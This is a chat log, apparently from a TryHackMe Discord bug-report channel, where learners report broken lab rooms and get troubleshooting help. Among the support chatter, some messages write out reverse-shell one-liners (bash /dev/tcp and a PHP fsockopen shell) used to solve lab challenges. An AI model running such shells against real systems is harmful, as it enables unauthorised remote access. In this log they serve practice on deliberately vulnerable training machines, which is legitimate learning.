hi, I'm not sure if this is the right place to request support, but I am having an issue with connecting to a windows machine using xfreerdp. [12:37:15:630] [1955:1956] [INFO][com.freerdp.client.common] - Network disconnect!
I've restarted the machine, and it still gives me the same issue.
sonic tapir
You should not have four forward slashes?
My bad, I always have those confused
teal barn
https://tryhackme.com/room/torforbeginners <danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion> should be https:// and not http:/: as stated in the description
http timeout while https works
glad badger
<https://tryhackme.com/room/torforbeginners> <danielas3rtn54uwmofdo3x2bsdifr47hu...
http works as well. If it times out, change the circuit a few times. π
teal barn
ok so np
wise pike
Just some feedback - In the XSS section of the top 10 OWASP room, and the XSS room itself, the XSS playground website on the machine you deploy is agonizingly slow. It seems to get stuck trying access jquery and some stuff on cloudflare when it presumably doesn't have internet access, just hangs for up to a minute whenever you change pages. Same issue in the machine for Task 7 (Broken Authentication), it hangs on "Looking up maxcdn.bootstrapcdn.com" for up to a minute with every click on the website
obsidian kiln
You're trying to sign in with a microsoft account
Set the username to .\wade, not MicrosoftAccount\wade
flat dawn
Set the username to `.\wade`, not `MicrosoftAccount\wade`
Let me try this
obsidian kiln
Not working
Try doing it inside Kali?
xfreerdp /v:10.10.183.0 /u:wade /p:PUT_THE_PASSWORD_HERE /dynamic-resolution +clipboard /cert:ignore
Obviously subbing in the correct password
flat dawn
Trying again
flat dawn
```xfreerdp /v:10.10.183.0 /u:wade /p:PUT_THE_PASSWORD_HERE /dynamic-resolution ...
I think ignoring the cert worked.
obsidian kiln
That'd help. Did that work?
flat dawn
```xfreerdp /v:10.10.183.0 /u:wade /p:PUT_THE_PASSWORD_HERE /dynamic-resolution ...
Thank You!!!
livid escarpBOT
Gave +1 Rep to @obsidian kiln
obsidian kiln
Np π
strong kelp
In the room https://tryhackme.com/room/dllhijacking, task 1, i think it is 'print spooler'
keen dome
Hi/ there. For the "rpmetasploit" room, the first Q&A option in task 7 no longer seems to valid.
glad badger
In the room https://tryhackme.com/room/dllhijacking, task 1, i think it is 'prin...
Fixed. Thank you for reporting. π
livid escarpBOT
Gave +1 Rep to @strong kelp
strong kelp
The first sentence in https://tryhackme.com/room/rppsempire does not make much sense.
I think it should be 'Starkiller uses a listener and a stager to create an agent. The listener does exactly as it sounds like ...'
cinder lantern
RDP doesn't seem to work in https://tryhackme.com/room/postexploit. Other rooms work fine, and SSH works. Resetting had no effect.
teal barn
@sleek jay https://tryhackme.com/room/tmuxremux
it lack the word more (task 2)
sleek jay
<@!291298445048676353> <https://tryhackme.com/room/tmuxremux>
it lack the word ...
This is @tardy lynx room.
Thank you!
teal barn
This is <@193946968316313600> room.
You helped him?
teal barn
oh π actually found it from here https://tryhackme.com/p/0day
sleek jay
π
teal barn
in the created room tab
sleek jay
Yeah it says Iβm a collaborator
teal barn
impostor π
marsh rose
I'm sure it was probably reported (especially looking at the room grade), but due to a few problems https://tryhackme.com/room/bof1 is quite painful: I used it as a starter for buffer overflows (after landing in the https://tryhackme.com/room/bufferoverflowprep via the Offensive pentesting path) as it's advertised, and as it's rated easy. A clear example is the fact the shellcode is not suitable for this room (or did I miss something?) it's really a pain, having a working shell code, or at the very least a clear mention that this shellcode is not expected to work would help so much getting the basics. Hopefully https://l1ge.github.io/tryhackme_bof1/ was quite helpful to fix the missing bits and complete alone the last task, but without it this room seems quite difficult for newcomers to buffer overflows. Certainly not an easy one. It's a bit sad as it still contains interesting and fun content.
digital zinc
I believe that I might have found a room task that might be accepting a lowercase character when it should in reality only allow for an uppercase character. If that's the case, who should I contact to possibly rectify it?
zealous vortex
THM answer fields allow for some tolerance, so it's not a bug per-se
indigo epoch
In the room Ra, when trying to run spark, the spark program crashes everytime. Impossible to get past on my end.
indigo epoch
Might be an issue with Java on the box, ill conduct more testing later and try replicating the issue.
digital phoenix
In the Room Nax, the answer of Q8(Metasploit module name) is old. The name has changed.
lyric walrus
Hello everyone, room regular expressions task 4 question 10 accepts only a wrong answer (.?\W+ instead of .?\S+) (sorry for the spoiler)
Tryhackme.com/room/catregex
eternal summit
wild card on the last letter?
Answer tolerance, not a bug
thin tartan
Was there a room for like typos, ?? I guess feedback room would have been better,
eternal summit
Was there a room for like typos, ?? I guess feedback room would have been better...
It's THM's answer tolerance. Refresh the page and it will go away.
Typos in rooms count as bugs.
slim sapphire
hello
sleek jay
Hello
slim sapphire
total 28 drwxr-x--- 4 www-data www-data 4096 Jun 3 2020 . drwxr-xr-x 3 root root 4096 May 18 2020 .. drwxr-x--- 2 www-data www-data 4096 May 21 2020 css -rw-r----- 1 www-data www-data 17 May 22 2020 drpepper.txt -rw-r----- 1 www-data www-data 1723 May 26 2020 evilshell.php -rw-r----- 1 www-data www-data 2200 May 21 2020 index.php drwxr-x--- 2 www-data www-data 4096 May 21 2020 js
sleek jay
what's the output for this cat evilshell.php
maybe it's your keyboard layout
copy my message
wheat fractal
Hey guys, there is a problem with the room 'Fowsniff' (at least for me). According to the room, the root should be done editing 'cube.sh' and log again. The problem is editing it, in many ways, with different shells, doesnt work at all.
slim sapphire
using netcat?
sleek jay
Hey guys, there is a problem with the room 'Fowsniff' (at least for me). Accordi...
What type of payload are you putting in cube.sh?
And do you know where root is executing it?
wheat fractal
yes
i know
i tryed python's and bash
i send you
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
then the normal one suggested in the room
sleek jay
try bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Did you replace the IP with your own VPN?
Because I know it's not 10.0.0.1
wheat fractal
i try, i log in again
yes, wpn works
also the shell works
if i do from the dir ./cube.sh
it works
the problem is that doesn't start if i log in, as should be
sleek jay
Not if you login, it's supposed to happen when root logs in.
wheat fractal
ok
slim sapphire
any reverse shell doesn't work, tried bash and nc
sleek jay
any reverse shell doesn't work, tried bash and nc
php -r '$sock=fsockopen("<IP>",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
slim sapphire
yeah it works
sleek jay
Ayee
slim sapphire
thanks @sleek jay
livid escarpBOT
Gave +1 Rep to @sleek jay
sleek jay
No problem
dark apex
but doesnt work as it should
i can confirm everything is working fine, i just completed the room. just one thing simple bash reverse shell didn't work. needed to provide it as a argument in sh -c or bash -c . why is that @sleek jay
tiny ginkgo
Room: https://tryhackme.com/room/linuxfundamentalspart3
Umm... >, >>.. These are not pipe operators... ???
thin tartan
IO redirection symbols maybe,
eternal summit
Redirection operators
wheat fractal
i got the first question correct lmao , and the text above say that im wrong.
wheat fractal
That's answer tolerance
why answer tolerance exits in questions like this ???
eternal summit
The room creator has no control over it.
night viper
hello everyone i think there is a problem with room named internal
wordpress isn't loading completely
this is how it looks
the resources are in internal.thm which is in assessible
wheat fractal
Guys anthem vm is not working, i waited 10 mins for it to boot up but it doesn't work? Any suggestions?
obsidian kiln
@night viper
Read the bit at the start. It's usually useful
And maybe don't try hard rooms if you're not familiar with vhosting
viral cobalt
-ban @wheat fractal steam scambaiting
livid escarpBOT
π¨ Banned Dα΄Κα΄#3867 indefinitely
dense sentinel
where to report broken link ? http://tryhackme.com/room/networkservices
twin tapir
-ban <@456226577798135808> steam scambaiting
Oh my gorsh he banned dorkstork
slim sapphire
Is there a bug in OWASP Top 10 reflected XSS machine?
on sending a payload with js code to display machine's ip address in an alert, no flag is displayed
mental blade
having lots of problems in the room: Upload Vulnerabilities... most of the pages dont ever load.. i was only able to complete half the room.. the machine works.. but i have to keep reloading 20 times per page to work..
eternal summit
Sounds like a VPN issue
tropic flameBOT
TryHackMe
mental blade
i'l look into it.. thanks for the reply.. im kinda new in this world
zealous vortex
We all start somewhere :). Don't be afraid to ask questions, that's what this discord is for
worthy moon
Hi how you
how are you*?
I'm having issues with this room EasyCTF
I'm trying to execute an .py file but it gives me this error
zealous vortex
that's a better question forr #room-help or #room-hints . This channel is for bugs in the rooms
worthy moon
ok I'll go there
unreal patio
Hey! My anti-virus is flagging the first Network Services room pretty heavily, is that normal?
zealous vortex
Avast?
unreal patio
Yup!
zealous vortex
Yeah, some AV will report issues with THM, as a lot of rooms involve malicious code in various ways. You can whitelist/allow the tryhackme.com domain if you want. You're taking a bit of a risk there, but none of the rooms on THM are designed to hurt you
unreal patio
That makes sense. Appreciate the help!
tired agate
Hey hi, I've somehow managed to achieve NaN time left on the AttackBox. Just send me a DM if you like to know the IP on the machine in question.
dry zealot
bug in burp suite, correct answer check skips last letter in the string
title is owasp juice shop
task 7 question 6
eternal summit
Answer tolerance, not a bug. Refresh the page.
rancid adder
https://tryhackme.com/room/kenobi
ProFTPd things near last question, mounting doesnt show up anything, double checked the steps (copying, mounting) but still can't find the rsa key
eternal summit
Not a bug, user error
boreal oriole
abstract holly
Are you on the attack box or the machine they asked you two spin up?
They are separate vms
astral quartz
attack box
abstract holly
You'll have to spawn the vm and ssh into it
Be nice, it's an honest mistake fluff π
astral quartz
before i even learn how to do that?π©
harsh oyster
You'll have to spawn the vm and ssh into it
Fundamentals 1 spawns in split view
astral quartz
how to ssh into a vm nd wot u said
Im dumb
Ill be honest
I don't know anything thas y im tryna learn
abstract holly
Dont worry, lemme go to the room
astral quartz
Thanks g
harsh oyster
@astral quartz Power down attack box, revisit the room after it's down. Click the "Start Machine" button in Task 3 of the room
This will spawn a correct machine to finish the tasks
astral quartz
Thanx g
harsh oyster
Be nice, it's an honest mistake fluff π
I am nice! 
raven ice
Hi, now im doing Linux Fundamentals Part 1
and i cant run the machine. Any one help?
abstract holly
!docs verify
tropic flameBOT
TryHackMe
wheat fractal
Another Czech nice
abstract holly
Im not clicking on that link π
raven ice
harsh oyster
@dusky junco ^
Works fone for me though
@raven ice you can try relaunching your browser and relogging in tryhackme for a good measure
raven ice
ok thx!!
marsh rose
Hi, I've just finished the room brainstorm, and I wasn't able to get the 1st question (About the number of ports) correct.
I've ran multiple nmap and they always give the same number of ports, and it's twice less than what the expected answer is.
I've been looking at some writeups, and in the nmap output (like from TCM) it only shows the same few ports (ie. less than what the expected answer is)
I've seen messages of other people being also confused about this.
wheat fractal
Hey!! Probably it is not really a bug, but rather the effect of changes in general, but in Shodan room, first question in task 3 does not accept correct answer. https://tryhackme.com/room/shodan
fringe cliff
hi, not sure if this is a bug. I'm in the network services 2 room doing task 4 exploiting NFS. After I ssh into the machine and ran the bash file, I got the root access. But the root flag file isn't there
sorry nvm i figured it out
dusky junco
ok thx!!
Hi ((: did the steps that @harsh oyster recommended work by any chance? This looks like something you'll have to email support@tryhackme.com about. Could you include this screenshot (#room-bugs message) & your THM username please? Thankss!
thorny fjord
Hey!! Probably it is not really a bug, but rather the effect of changes in gener...
Wanted to raise this concern...it seems to be some issue with this room
obsidian kiln
@green steppe shodan go brokey
oblique violet
is there an issue with RootMe room? I am connected with openvpn and the IP of the box it gives me doesn't seem to be working.
trying through the attackbox now to see if there is an issue.
unique pewter
Hey guys, I found out it's possible to bypass the challenge for OWASP top 10 - task 25 - #2 (Admin cookie)
You get logged into the page as admin if you go to /admin without a cookie
winter path
I am unable to open vulnversiry and blue room in offensive pen test path, everything else opens just fine
I tried different browsers, PCs etc.
eternal summit
That's a site bug
hardy tendon
The osquery room is so broken. Is this a known thing?
eternal summit
99% of the time, the room isn't broken and it's user error
If you're trying to report a bug, please provide details
hardy tendon
I'm just making sure it's not a known problem. I've been working on this thing since yesterday and almost nothing works as it says in the description. I'll grab some examples.
Task 9
From this point forward, osqueryi becomes unusable and has to be killed. Half the tables I try to query cause this.
After a few of those, the entire machine becomes unusable (100% CPU). I have restarted mine at least 10 times already.
and here we go again:
dusky junco
Mhm I can't remember if that room came out before the base image changes
I'll benchmark out of curiosity, might just need switching to a t3.small cc @obsidian kiln @hardy tendon
hardy tendon
One more thing that happened yesterday: when I opened the web interface for Kolide and clicked on "add new host", there was no "Osquery Enroll Secret". Since I didnβt know it was supposed to be there, I've spent an hour trying to find it somewhere else.
Finally I decided to restart the machine, and this time it was there.
hardy tendon
I'll benchmark out of curiosity, might just need switching to a t3.small cc <@!...
Thank you
livid escarpBOT
Gave +1 Rep to @dusky junco
wild bramble
https://tryhackme.com/room/blue isnt loading?
misty adder
Good day,
I just finish (All In One) room and found it's not vulnerable in Arbitrary File Upload as mentioned in official write-up by the room creator
I try it with Metasploit and Try it Manually
Vulnerable version is 3.1.3 and the version in the room is 3.1.7 (up-to-date)
eternal dagger
why one of the room name "Blue" is keep loading?
eternal summit
why one of the room name "Blue" is keep loading?
It is a site bug.
eternal dagger
It is a site bug.
is it going to get fixed?
eternal summit
Probably.
livid escarpBOT
Gave +1 Rep to @eternal summit
wheat fractal
in Advent of Cyber 1, supporting materials for Task 24, the explanation of the && control operator is either incorrect or the author is trying to say something else. It reads: "The && operator is used with more than one command e.g. ls && pwd. The second command only executes if the first command and the second command is successful. You can pass an input containing && other-command and the backend would successfully execute it if both commands ran successfully."
wheat fractal
"The second command only executes if the first command and the second command is successful." - maybe they are trying to say something I'm not expecting ? But I read it as "if the second command is not successful, it does not execute", as if we were talking about a transaction. The same again at the end of the paragraph
If we are trying to explain that the exit status will only be 0 if both commands are successful, that would be correct indeed. But I don't think it is what is intended, in the context of the xmas task
zealous vortex
what they are talking about is called short-circuit evaluation, but it's worded incorrectly
with &&, if the first statement is false, the second statement is never executed, because there's no way the conjunction can be true. Similarly, with ||, if the first statement is true, the second statement does not need to be executed, because the overall statement will still be true.
real rover
Hello,
This room is private, it's normal ?
https://tryhackme.com/room/zthlinux
civic brook
many of the linux walkthrough rooms have been updated and the older ones made private
tacit parcel
Hi Folks, just a question...
viral cobalt
Hi Folks, just a question...
you should probably say your question π
autumn cradle
Hey everyone,
In the room "how websites work" there is a sort of popup that gives tips, with two button "back" and "next". The first tip is getting hidden due to its position. The content is unreadable there
hollow lantern
I might be wrong, but I think task 7 of the rpmetasploit room needs updating - On metasploit v6.0.48-dev, searching for "server/socks5" returns no results, but searching for "socks" returns "auxiliary/server/socks_proxy" as well as "socks_unc" and "sockso_traversal". Can anyone confirm or is this a bug on my end?
zealous vortex
the msf modules have been renamed since that room was releasesd
hollow lantern
I see, thanks!
hollow vector
Hey everyone,
In the room "how websites work" there is a sort of popup that gi...
Hi there, that might be down to your resolution on your webbrowser. I had a similar issue before and resolved it using the zoom function
autumn cradle
Hi there, that might be down to your resolution on your webbrowser. I had a simi...
I'll give it a try. Thanks
livid escarpBOT
Gave +1 Rep to @hollow vector
eternal summit
That's a site bug
eternal summit
Wait for it to be fixed.
wild bramble
is it me or the image is not loading?
https://tryhackme.com/room/xss
tried refreshing a lot, used different browsers
viral cobalt
yessir
silver igloo
Anyone done Corp recently? It says the Admin accounts expired
compact meadow
Yeah, you need to reset the password
silver igloo
mmm tried that but it just fails, Ill try again
silver igloo
wow, worked that time.... the qwerty was not strong with me tonight. thanks
wraith shuttle
Osquery room is broken yet again,
the CMD command for starting the endpoint monitor in step 6
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure
does not work, seems to be a path issue.
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure --osqueryd_path="C:\Users\Administrator\Desktop\launcher\windows\osqueryd.exe"
works, but still crashes and doesn't connect back to fleet
Fix
wraith shuttle
Okay, so osquery Task9 - Q6, I checked the date in windows defender, made sure the format is good but still no good, literally tried adding in all the possible second combinations. Should I look for a solution in osquery?
wraith shuttle
2021-03-31 17:51:09 or 2021-03-31 17:50:44
the only 2 dates that are in the event logs, none work, this box is crying for help, at least give it 2 cpu's.
hardy tendon
2021-03-31 17:51:09 or 2021-03-31 17:50:44
I went through that problem. I found the accepted date using the XML view in Event Viewer. It's a few hours away from one of those two, so I'm thinking it's a time zone issue?
I've had all sorts of problems with this room. Definitely the worst one I've done so far.
vernal jewel
issue with task 4 exploiting nfs - https://tryhackme.com/room/networkservices2 .
this is my output when I run bash
soft terrace
issue with task 4 exploiting nfs - https://tryhackme.com/room/networkservices2 ....
Not a bug. You downloaded it incorrectly.
vernal jewel
oh
soft terrace
oh
if you want to use wget then: wget https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash?raw=true
You might wanna rename it afterwards
vernal jewel
@soft terrace thanks, I was missing the ?raw=true portion
livid escarpBOT
Gave +1 Rep to @soft terrace
soft terrace
<@!753559995714502666> thanks, I was missing the ?raw=true portion
If you want to download something with wget from github click on raw first
dusky junco
Fixed thanks ((:
livid escarpBOT
Gave +1 Rep to @thorn forge
cloud obsidian
In splunk room, https://tryhackme.com/room/bpsplunk
Task 2 last question, the answer it accepts is ||answers.splunk.com||
But splunk has changed the url to|| community.splunk.com||
cedar patrol
In the owasptop10, task 20 and the last question on XSS, the answer was actually placed in the hint section, please rectify it. It should be hint not pure/plain answer
sharp wave
throwback: Fetching certificate, never gets downloaded or offered to me
viral cobalt
can you open up the dev console and see if there's any errors? @sharp wave
jagged veldt
Hello,
I think the "Enterprize" box is experiencing an error in the CMS used and exploitable, after a few seconds of navigation shows on all pages the error "Oops, an error occurred!".
PS: In order not to make spoiler, I don't want to give exact details.
eternal summit
@real rover #room-help
tiny ginkgo
Room: https://tryhackme.com/room/torforbeginners
Task: 3
The link to the tor browser installation guide for kali is broken.
https://hackingpress.com seems to be down for some SSL certificate issues.
torn crown
owasp juice shop room task 4- im logging in with the admin user and pass but not getting the flag
nvm it just wasnt updating for some reason
wheat fractal
Heyo! I am doing OWASP room, task 26, [Severity 8] Insecure Deserialization - Code Execution, and something is wrong with the webapp, I am getting 500 on feedback subpage :/ I am using AttackMachine.
I could make an account, see cookies, got to admin panel, all kinds of stuff, but then this.
zealous vortex
probably not a room bug. Just means the service is encountering an error, which could be related to something you just did. It's been a while since I did that room, so I don't recall that task very well
wheat fractal
Ok, I will try to kill machine and spawn another one then, and we will see if it still happens. I di not really 'mess' with anything, just watch cookies and went to admin panel by changing directory, no hacking anything really.
zealous vortex
hm
perhaps it requires that you're auth'd first, and that's why it is returning an error? Again, just guessing here, as I don't have that room in front of me
wheat fractal
I do not know. I killed machine, deployed a new one, only made an account at this web, and 500 again π¦
well, I will do other tasks for now.
zealous vortex
let's jump over to #room-help
wheat fractal
ok
limpid summit
in the attacktivedirectory room, in task2, the instructions for installing impacket are wrong, as sudo cd isnt a command, it's just cd, sorry if this doenst classify in this channel
obsidian kiln
@viral cobalt
viral cobalt
smh, y'all think I know how sudo works? I run everything as root!
eternal summit
I mean, just sudo su at the start
viral cobalt
it's fixed, nematode!
glad badger
sudo judo
torn crown
trying to start the upload vulnerabilities room
i copied the command they give me in my terminal but doesnt seem to be working
zealous vortex
open your /etc/hosts file and make sure it's been updated correctly. And use the site names, not the IPs, in your browser (with http://).
torn crown
ok my hosts file is good i think
it says to do the what the shell room first anyways so i might do that
zealous vortex
You have multiple entries for the same hosts, you want to delete them so that there is only one
torn crown
O
zealous vortex
you've run that command multiple times
but now your computer doesn't know which IP it should point to
torn crown
could i just delete the file and redo the command?
zealous vortex
So, not a room bug :). Let's hop over to #room-help
torn crown
okey
wheat fractal
Hey everyone, I am having an issue with the non-metasploit portion of the Steel Mountain room. When I use the recommended exploit for the rejetto HTTP file server (https://www.exploit-db.com/exploits/39161) to upload netcat and execute it to get a reverse shell, it seems like netcat on the target machine never executes because I never get a connection back on my machine.
I can see successful GET requests on the python web server for nc.exe on my machine, so its definitely uploading netcat to the target machine.
I've tried restarting my machine, restarting the attack machine, and have ensured that I'm using the correct IPs and ports.
Anyone have any ideas if this is a bug or if I'm doing something wrong? I checked some writeups and they did it the same way as me with no issues, so I'm not sure..
https://imgur.com/a/Cncb1HF some screenshots to see what I am doing.
unique stone
Hi, Recently i have joined this course and want to join room 'HackPark' but its not loading tried every browser cleared cache everything but not loading.. please resolve this issue ASAP....
elfin gust
Where is flag4 ? Linux challenges
hot flame
Hi! I don't know if anyone has the same issue but I am unable to enter Learn Rust room
Already tried a lot and it's always stuck loading
I have been trying for the past 5 days and it's always the same
unique stone
@hot flame same happened with me in hackpark room
eternal summit
Again, site bug.
autumn cradle
In the owasptop10 room one of the questions being asked is who developed the tomcat application. However it's not accepting the answer, even after I added "The" before it
eternal summit
Not a bug, your answer is probably just wrong.
autumn cradle
Ok
keen niche
Hello, don't know if this the right section. I'm trying to play with the For Business Reason by MsMouse but the wordpress site is extremely slow and basically can't do anything in it. Anyone recently had the same experience or is just me? Thank you.
wheat fractal
year of jellyfish shell not comeng
Δ± try everything
Δ± try attackbox my mainos bot
shell not comeing
eternal summit
Unlikely to be a bug with the room, much more likely to be user error. Have you checked the writeups?
wheat fractal
Unlikely to be a bug with the room, much more likely to be user error. Have you ...
yes Δ± check
Δ± upload my shell
but shell not comeing
Δ± can send my payload
eternal summit
It sounds like you should be in #room-help first, until you're actually certain that the room is not working correctly.
The room won't have changed.
obsidian kiln
year of jellyfish shell not comeng
Δ± try everything
Δ± try attackbox my mainos bo...
That's not a room bug -- it's you either not understanding what's going on, or not enumerating properly
Room has not changed, and it's specifically designed to be very difficult to get a shell back from
wraith ice
I have room bug to report on Upload Vulns final task.
eternal summit
cc @obsidian kiln this hasn't changed, has it?
wraith ice
im getting the 'module not found' error. You said in #room-help that its a magic number issue but theres no magic number in the file i uploaded.
file uploaded minus the ip
command typed following enum of the propper name
the error
it appears to hang like its going to connect to my nc listener and then it spits that error at me every time. Ive been trying it for 2 days with no change in error
@obsidian kiln this is the middle of day 3 so im a bit frustrated. lol
obsidian kiln
@wraith ice you appear to be missing an IP address in that payload
wraith ice
as i said in the caption, i removed the ip for that screenshot. idk if i can share the thm openvpn ip
but i can show it to you with the ip as it was uploaded.
@obsidian kiln
obsidian kiln
What's the box IP address?
wraith ice
10.10.105.60
obsidian kiln
Let's take a look π
wraith ice
awesome, thanks mane.
obsidian kiln
Do you have netcat started?
wraith ice
I'd love for it to be something I'm missing but I'm 99% sure I've tried everything at this point. I've followed guides, done my own troubleshooting, and came here as an absolute last resort.
yes nc -lvnp 4444
wraith ice
i have 2 running
so i have a 4444 and 443 running neither of them are currently connected
obsidian kiln
Anything come through on the 443 one now?
wraith ice
negative
obsidian kiln
Okay, so there's something in the way at the network layer there
What OS are you using?
obsidian kiln
Kali shouldn't have a firewall in the way. Hm
Start a webserver for me?
Just a python3 -m http.server
eternal summit
VPN running directly in the VM?
obsidian kiln
Yeah, that's a good shout. VPN is connected from the VM, right?
wraith ice
yes
obsidian kiln
Any other VPNs on the host?
I've seen having an external VPN active on the host mess with this challenge in particular for some reason
wraith ice
oh yes!
i just closed it out but i did have one running on host
ok webserver is started
obsidian kiln
What port?
wraith ice
8000
obsidian kiln
Okay, so definitely connects back
wraith ice
yeah i just saw you connect
obsidian kiln
Try starting a netcat listener on port 8000?
wraith ice
retrying local 0.0.0.0:8000 : Address already in use
obsidian kiln
Stop the webserver first
obsidian kiln
I suspect backgrounded servers still hold on to their port
obsidian kiln
That connect back?
wraith ice
yes
obsidian kiln
So I wonder why 443 wasn't working. Odd
Give me a sec -- I'll update one of your shells in the container to try port 8000
wraith ice
well i also have the one on 4444
obsidian kiln
Right, start a netcat listener on port 8000 and try MMK.jpg?
Oh, Node does not like that shell
This is why it's failing
You sure you didn't mess with that magic number? I can't check it in this container
wraith ice
it depends which file youre messing with. like i said ive tried with and without. the one that im certain contains no magic number is CVG.jpg
obsidian kiln
CVG.jpg -- will try that one π
wraith ice
that on is pointing back to 4444 and is the one i screenshotted for you earlier
obsidian kiln
Yep. Try a listener on port 8000 for me?
This one has had its magic number edited as well
I'll try a completely blank version
Oh, that's not the magic number error
That's because you missed the bracket at the start of the shell
wraith ice
thats the one i sent you earlier. it was directly copied from the linked guide. pasted in to gedit ip and port added and saved as shell.jpg
obsidian kiln
I'm going to have to kill it in a second given I activated it manually and can't keep the terminal open forever -- you can activate it again with ../content/test.jpg though
wraith ice
yeah i gotchu. thanks for your help man. i really appreciate it
obsidian kiln
No problem π
wraith ice
works like a charm. quick question. Do all js functions start with an opening bracket before function? or is it just this shell.
because i did do a search for a .js shebang to look it over. clearly i missed that but im just asking for future knowledge
sonic willow
works like a charm. quick question. Do all js functions start with an opening br...
only if they're self invoked, so no not always
wraith ice
@sonic willow so if the script called for it to be a self contained thing you would but if the use case didnt require it you wouldnt, right?
sonic willow
<@!180392440945967104> so if the script called for it to be a self contained th...
yeah exactly, see this post on why you would need one :)
https://stackoverflow.com/questions/592396/what-is-the-purpose-of-a-self-executing-function-in-javascript
obsidian kiln
works like a charm. quick question. Do all js functions start with an opening br...
Nah, it's just telling it to execute as soon as the script is called -- self-invoked, as Jake called it
desert blade
I have try the OpenVAS room in THM and a little bit confused because the report that I get is different from the actual answer in that room. link of OpenVAS room https://tryhackme.com/room/openvas #PS in the OpenVAS room the installation procedure maybe outdated and didn't work with the new version of OpenVAS especially in default credentials.
amber canopy
XSS is working in OWASP-Juice-Shop but the flag isn't displaying. I've followed the troubleshooting included in the first part of the room with no luck.
sonic willow
https://tryhackme.com/room/windowsfundamentals1xbx - task 10
Hence, Task 8 ended with a detailed blog post explaining the Task Manager in great detail. - task 9 covers the task manager
should be: Hence, Task 9 ended with a detailed blog post explaining the Task Manager in great detail.
stiff girder
weak gate
in room corp you can't click on search and windows bottons therefore you can't open a prompt
eternal summit
in room corp you can't click on search and windows bottons therefore you can't o...
Do you need one? This sounds like a bug with your RDP client NGL.
smoky dew
Thought I'd subscribe, try out the service and start from the very beginning. Not a bug as such, just a typo - https://tryhackme.com/room/beginnerpathintro. When doing the Network Security task it states The air conditioning units where not directly owned by Target it should be ***were ***not where. Not too sure if you want feedback on anything like this or if this was the correct channel but thought I'd mention it.
obsidian kiln
Yep, feedback for this is appreciated. Thanks @smoky dew π
livid escarpBOT
Gave +1 Rep to @smoky dew
obsidian kiln
Ah, Damn. Can't fix that bit.
@glad badger, enjoy.
https://tryhackme.com/room/beginnerpathintro
First site:
Second website: were not where
chrome yacht
There is a small typo in the JavaScript room, after the break it's a normal colon and not a semicolon. It leads to an Unexpected token error when running the code
Task 3 - Conditionals
glad badger
Ah, Damn. Can't fix that bit.
<@!719230703161835633>, enjoy.
https://tryhackme.c...
I think I have those on my list, those are all related to the Static Site lab pages?
obsidian kiln
Aye
untold mural
This isn't really a bug, but a suggestion to turn updates off on gdb pwngdb on the cod caper room, when you first run it, the tool trys to update and hangs for some time.
cold shuttle
Pretty sure it tells you to get a command shell first, for that reason
(It certa...
I am trying to upgrade the shell to meterpreter, but keep running into a Post Failed error and haven't been able to find a solution.
lime yarrow
is the theseus room page broken? last think I have on the page is "answer questions below" but no fields to input answers or anything.
no errors in web console. tested with chrome in win10 and kali linux
hazy tiger
Leave and rejoin the room
dusky junco
Ah, Damn. Can't fix that bit.
<@!719230703161835633>, enjoy.
https://tryhackme.c...
I can make a change
dusky junco
No problemo
weak gate
in the room Corp there is a problem. connecting to internet, Invoke-WebRequest doesn't function
CategoryInfo: Not Specified: (:) [], MethodInvocationExeption
FullyQualifiedErrorId: WebExeption
twin tapir
youre attempting to use the command directly from the room
the command downloads from a URL, targets on the THM range dont have access to the internet
you will have to host the tool from your localhost
lime yarrow
Leave and rejoin the room
thanks. Pretty annoying that I had to drop out of the room though as I loose all the progress
livid escarpBOT
Gave +1 Rep to @hazy tiger
hazy tiger
thanks. Pretty annoying that I had to drop out of the room though as I loose all...
You don't lose progress when you leave and re-join a room...?
I'm slightly confused π
weak gate
you need to host the tool with a utility like updog, python http-server, etc
makes sense
lime yarrow
You don't lose progress when you leave and re-join a room...?
well the servers gets reset so all rev shells etc will get killed
hazy tiger
You could have noted the flags down and inputted them after completion :)
lime yarrow
yeah well
dusky junco
Ah, Damn. Can't fix that bit.
<@!719230703161835633>, enjoy.
https://tryhackme.c...
both sites updated (takes about 5-10mins to update through CDN, etc) thanks cc @smoky dew
livid escarpBOT
Gave +1 Rep to @obsidian kiln
restive sparrow
There seems to be an issue with the text in this room. the text isn't complete am confused what am supposed to can someone please look into this. Thanks
quiet drum
Need Help For Sakura Room by OSINT Dojo
Is the Onion site up?
I mean the Deep Paste
I don't think it's up anymore.
Actually I solved that room in april.
But today I was making a video walk-through
Then I discovered that the onion site is not working any more
Any THM Staff available to verify this problem?
dusky junco
Need Help For Sakura Room by OSINT Dojo
Is the Onion site up?
I mean the Deep Pa...
Can you DM me the site that you're expecting to visit? As well as the task & question number that you're on π
dusky junco
π
abstract holly
There seems to be an issue with the text in this room. the text isn't complete a...
It looks like our attacker got in via Remote File Inclusion (RFI). It's best to look around the system itself now for any evidence of persistence mechanisms that could lead to a payload. There are multiple ways to maintain persistence in most Linux distributions including but not limited to:
tiny ginkgo
Room: https://tryhackme.com/room/bpsplunk
Task: 2, Question: 31
I think the accepted answer should be changed to "community.splunk.com" as "answers.splunk.com" redirects to the above.
dusky junco
Room: https://tryhackme.com/room/bpsplunk
Task: 2, Question: 31
I think the acc...
Thanks, updated ((:
livid escarpBOT
Gave +1 Rep to @tiny ginkgo
dusky junco
Good find
soft ice
Linux Fundamentals Part 1 says the machine supposed to start in my browser but that doesn't happen
dusky junco
Do you have this button at the top of the page @soft ice?
dusky junco
π
distant crater
Room: https://tryhackme.com/room/retro, after doing an nmap scan it wont show an open port 80 so the gobuster enumeration also wont work, checked the writeup and i think it should be open
obsidian kiln
Room: https://tryhackme.com/room/retro, after doing an nmap scan it wont show an...
How long has the machine been started for?
distant crater
about 15 min
obsidian kiln
That should be enough time to start
Give it another five, just to be safe, then try redeploying
zealous vortex
Typo in the new Windows Fundamentals 2, task 1:
In Windows Fundamental 1
Should be plural
glad badger
Typo in the new Windows Fundamentals 2, task 1:
In Windows Fundamental 1
Should ...
Fixed. Thank you for reporting. π
livid escarpBOT
Gave +1 Rep to @zealous vortex
lime yarrow
is the haskHell room having problems? I no matter what haskell script I upload, it just throws internal server error.
